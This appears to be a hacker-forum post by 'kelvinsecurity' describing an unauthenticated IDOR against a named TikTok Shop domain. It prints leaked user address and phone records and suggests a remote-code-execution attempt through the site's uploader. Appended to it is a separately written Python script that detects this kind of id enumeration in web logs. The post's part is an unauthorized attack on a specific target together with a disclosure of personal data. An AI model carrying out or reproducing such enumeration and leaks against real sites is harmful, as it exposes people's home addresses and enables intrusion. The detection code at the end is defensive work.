Hello again, greetings from kelvinsecurity to the community. Today I come to clarify a mechanism for executing the vulnerability for the disclosure of information from TikTok Shop users around a separate domain.
Victim:
[Image: 1.png]
- [email protected]
- tiktokshopin.com
- TikTok, 10100 Venice Blvd, Culver City, CA 90232
What was tried?
1 - Disclose user information.
2 - Get an RCE through the uploader, skipping the permissions around Laravel technology.
Proof of concept:
1 - Using Burp Suite and only the basic tools of search engines for code inspection and network interception, it was possible to identify weak points that could allow the disclosure of user information, perhaps some type of IDOR or RCE in case we are successful.
This will be easy, since I will not give step-by-step details of how to obtain the information; this will be fast.
Identify: /addresses/417/edit
As you can see, it has an ID that represents the number in which the person's address was registered.
Now we can use it with lower or higher numbers.
[Image: admin.png]
Example Results:
[Image: sar.png]
Abusing this filter does not require authentication:
Quote:
{"data":{"address_data":{"id":400,"user_id":597,"address":"9243 Ansley Street Apt. 503\nWest Estella, HI 77176-5966","country_id":101,"state_id":16,"city_id":1404,"longitude":null,"latitude":null,"postal_code":"53267-7787","phone":"+8885235414050","set_default":0,"created_at":"2022-07-25T02:01:00.000000Z","updated_at":"2022-07-25T02:01:00.000000Z"
Quote:
{"data":{"address_data":{"id":401,"user_id":598,"address":"704 Aida Inlet\nPort Ralph, AL 71689-8221","country_id":212,"state_id":3424,"city_id":39227,"longitude":null,"latitude":null,"postal_code":"14009-6373","phone":"+1901207022226","set_default":0,"created_at":"2022-07-25T02:01:00.000000Z","updated_at":"2022-07-25T02:01:00.000000Z"},"states":[],"cities":[]}
If you want to test the RCE in the future, I recommend using the uploader.
[Image: shell.png]
Laravel config:
Thanks.
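The IDOR above (an object id in /addresses/<id>/edit with no ownership check) is fixed in the application by scoping the lookup to the authenticated user; on the monitoring side, the enumeration it invites shows up in the web server log as one client successfully fetching many distinct ids in a short window. As an added example that is not part of the post, the following Python flags that pattern over a constructed access log; the sample lines, client IPs and thresholds are made up.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample access log (combined format) with two clients; not from the post.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Jul/2022:02:10:01 +0000] "GET /addresses/400/edit HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Jul/2022:02:10:02 +0000] "GET /addresses/401/edit HTTP/1.1" 200 815 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Jul/2022:02:10:02 +0000] "GET /addresses/402/edit HTTP/1.1" 200 790 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Jul/2022:02:10:03 +0000] "GET /addresses/403/edit HTTP/1.1" 200 801 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Jul/2022:02:10:04 +0000] "GET /addresses/404/edit HTTP/1.1" 200 799 "-" "Mozilla/5.0"
198.51.100.20 - - [25/Jul/2022:02:11:00 +0000] "GET /addresses/417/edit HTTP/1.1" 200 820 "-" "Mozilla/5.0"
198.51.100.20 - - [25/Jul/2022:02:12:30 +0000] "POST /addresses/417 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Object route from the post: /addresses/<numeric id>/edit
TARGET_RE = re.compile(r"^/addresses/(\d+)/edit$")
def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for unparseable lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)

def detect_id_enumeration(log_text, min_ids=5, window_seconds=60):
    """Map client IP -> sorted distinct address ids for clients that successfully
    fetched at least min_ids distinct address records within window_seconds."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, path, status = parsed
        m = TARGET_RE.match(path)
        if m and method == "GET" and status == 200:
            hits[ip].append((ts, int(m.group(1))))
    flagged = defaultdict(set)
    for ip, events in hits.items():
        events.sort()  # sliding time window over this client's successful fetches
        start = 0
        for end in range(len(events)):
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            window_ids = {addr_id for _, addr_id in events[start:end + 1]}
            if len(window_ids) >= min_ids:
                flagged[ip].update(window_ids)
    return {ip: sorted(ids) for ip, ids in flagged.items()}
```

Only 200 responses count, so an application that has been fixed to return 403 for records the caller does not own drops out of the alert by itself; the legitimate user editing a single record is never flagged.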